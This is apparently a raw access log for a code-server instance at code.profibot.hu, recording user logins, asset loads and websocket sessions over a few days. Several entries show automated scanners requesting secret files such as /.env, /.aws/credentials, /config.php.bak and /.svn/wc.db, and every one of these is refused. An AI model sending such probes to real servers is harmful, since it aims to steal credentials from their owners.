[Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:22:26:34 +0000] - 401 401 - GET https code.profibot.hu "/config.php.bak" [Client 185.177.72.60] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[24/Jan/2026:22:26:34 +0000] - 401 401 - GET https code.profibot.hu "/application.yml" [Client 185.177.72.60] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[24/Jan/2026:22:26:34 +0000] - 401 401 - GET https code.profibot.hu "/swagger.json" [Client 185.177.72.60] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[24/Jan/2026:22:26:35 +0000] - 401 401 - GET https code.profibot.hu "/appsettings.json" [Client 185.177.72.60] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[25/Jan/2026:01:54:34 +0000] - 401 401 - GET https code.profibot.hu "/.env" [Client 45.139.104.168] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" "-" +[25/Jan/2026:22:58:23 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 37.76.42.58] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[25/Jan/2026:22:58:23 +0000] - 304 304 - GET https code.profibot.hu "/login" [Client 37.76.42.58] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[25/Jan/2026:22:58:23 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 37.76.42.58] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[25/Jan/2026:22:58:23 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 37.76.42.58] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[25/Jan/2026:22:58:26 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.42.58] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[25/Jan/2026:22:58:27 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 37.76.42.58] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[25/Jan/2026:22:58:27 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-maskable-512.png" [Client 37.76.42.58] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[25/Jan/2026:22:58:44 +0000] - 302 302 - POST https code.profibot.hu "/login" [Client 37.76.42.58] [Length 31] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[25/Jan/2026:22:58:44 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 37.76.42.58] [Length 50] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[25/Jan/2026:22:58:44 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/home/coder" [Client 37.76.42.58] [Length 1387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[25/Jan/2026:22:58:46 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 37.76.42.58] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[25/Jan/2026:22:58:46 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-maskable-512.png" [Client 37.76.42.58] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[25/Jan/2026:22:58:47 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 37.76.42.58] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[25/Jan/2026:22:58:47 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 37.76.42.58] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[25/Jan/2026:22:58:47 +0000] - 302 302 - GET https code.profibot.hu "/?folder=/home/coder" [Client 66.249.81.130] [Length 52] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[25/Jan/2026:22:58:47 +0000] - 200 200 - GET https code.profibot.hu "/login?folder=/home/coder&to=" [Client 66.249.81.128] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[25/Jan/2026:22:58:48 +0000] - 200 200 - GET https code.profibot.hu "/update/check" [Client 37.76.42.58] [Length 80] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[25/Jan/2026:22:58:48 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=87547e31-358b-4882-bbd9-6cb587a3328b" [Client 37.76.42.58] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[25/Jan/2026:22:58:49 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/templates.png" [Client 37.76.42.58] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[25/Jan/2026:22:58:49 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-defaults%2Fthemes%2Flight_modern.json&tkn=" [Client 37.76.42.58] [Length 1393] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[25/Jan/2026:22:58:49 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-seti%2Ficons%2Fvs-seti-icon-theme.json&tkn=" [Client 37.76.42.58] [Length 7574] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[25/Jan/2026:22:58:50 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-defaults%2Fthemes%2Flight_plus.json&tkn=" [Client 37.76.42.58] [Length 1034] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[25/Jan/2026:22:58:50 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-seti%2Ficons%2Fseti.woff&tkn=" [Client 37.76.42.58] [Length 37336] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[25/Jan/2026:22:58:50 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fusr%2Flib%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftheme-defaults%2Fthemes%2Flight_vs.json&tkn=" [Client 37.76.42.58] [Length 1849] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[25/Jan/2026:22:58:53 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.42.58] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[25/Jan/2026:22:59:19 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.42.58] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[25/Jan/2026:22:59:57 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=074a0916-452b-4842-acfc-5c39c0c1d8a3&reconnection=false&skipWebSocketFrames=false" [Client 37.76.42.58] [Length 11302] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[25/Jan/2026:22:59:57 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=4a2eda8e-7f73-4266-bce1-c839a589336c&reconnection=false&skipWebSocketFrames=false" [Client 37.76.42.58] [Length 918048] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[26/Jan/2026:00:10:08 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/home/coder" [Client 37.76.46.87] [Length 1387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:00:10:10 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 37.76.46.87] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:00:10:10 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 37.76.46.87] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:00:10:10 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 37.76.46.87] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:00:10:10 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-maskable-512.png" [Client 37.76.46.87] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:00:10:10 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 37.76.46.87] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:00:10:10 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 37.76.46.87] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:00:10:11 +0000] - 302 302 - GET https code.profibot.hu "/?folder=/home/coder" [Client 66.102.9.71] [Length 63] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[26/Jan/2026:00:10:11 +0000] - 302 302 - GET https code.profibot.hu "/?folder=/home/coder" [Client 66.102.9.72] [Length 63] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[26/Jan/2026:00:10:11 +0000] - 200 200 - GET https code.profibot.hu "/login?folder=/home/coder&to=" [Client 66.102.9.71] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[26/Jan/2026:00:10:11 +0000] - 200 200 - GET https code.profibot.hu "/login?folder=/home/coder&to=" [Client 66.102.9.73] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[26/Jan/2026:00:10:11 +0000] - 200 200 - GET https code.profibot.hu "/update/check" [Client 37.76.46.87] [Length 80] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:00:10:11 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 66.102.9.71] [Length 427] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "https://code.profibot.hu/login?folder=/home/coder&to=" +[26/Jan/2026:00:10:11 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 66.102.9.71] [Length 769] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "https://code.profibot.hu/login?folder=/home/coder&to=" +[26/Jan/2026:00:10:11 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 66.102.9.71] [Length 769] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "https://code.profibot.hu/login?folder=/home/coder&to=" +[26/Jan/2026:00:10:11 +0000] - 200 200 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 66.102.9.71] [Length 427] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "https://code.profibot.hu/login?folder=/home/coder&to=" +[26/Jan/2026:00:10:11 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/templates.png" [Client 37.76.46.87] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:00:10:11 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.46.87] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[26/Jan/2026:00:10:11 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=623500f8-55e3-4245-b53b-c498c1ca13f6" [Client 37.76.46.87] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:00:10:16 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.46.87] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[26/Jan/2026:00:10:34 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=7bf6560d-4e62-4402-aa1d-34fa3099c7b7&reconnection=false&skipWebSocketFrames=false" [Client 37.76.46.87] [Length 10596] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[26/Jan/2026:00:10:34 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=3f327581-b8d2-41ca-a962-4b41189ff756&reconnection=false&skipWebSocketFrames=false" [Client 37.76.46.87] [Length 914125] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[26/Jan/2026:02:15:24 +0000] - 401 401 - GET https code.profibot.hu "/.aws/credentials" [Client 45.139.104.168] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1" "-" +[26/Jan/2026:06:51:07 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 195.178.110.242] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[26/Jan/2026:06:51:09 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 195.178.110.242] [Length 2621] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[26/Jan/2026:06:51:10 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 195.178.110.242] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[26/Jan/2026:06:51:11 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 195.178.110.242] [Length 2621] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[26/Jan/2026:06:51:19 +0000] - 401 401 - GET http code.profibot.hu "/.svn/wc.db" [Client 195.178.110.242] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0" "-" +[26/Jan/2026:06:51:20 +0000] - 401 401 - GET http code.profibot.hu "/.svn/entries" [Client 195.178.110.242] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0" "-" +[26/Jan/2026:06:51:25 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 195.178.110.242] [Length 29] [Gzip -] [Sent-to code-server] "-" "-" +[26/Jan/2026:06:51:26 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 195.178.110.242] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[26/Jan/2026:06:51:28 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 195.178.110.242] [Length 2621] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[26/Jan/2026:06:51:31 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 195.178.110.242] [Length 870] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[26/Jan/2026:07:11:52 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:11:52 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 84.1.26.27] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[26/Jan/2026:07:11:52 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[26/Jan/2026:07:11:52 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[26/Jan/2026:07:11:53 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[26/Jan/2026:07:11:53 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[26/Jan/2026:07:11:53 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[26/Jan/2026:07:11:54 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[26/Jan/2026:07:11:54 +0000] - 302 302 - POST https code.profibot.hu "/login" [Client 84.1.26.27] [Length 31] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[26/Jan/2026:07:11:55 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 50] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[26/Jan/2026:07:11:55 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/home/coder" [Client 84.1.26.27] [Length 1387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[26/Jan/2026:07:11:56 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[26/Jan/2026:07:11:56 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" 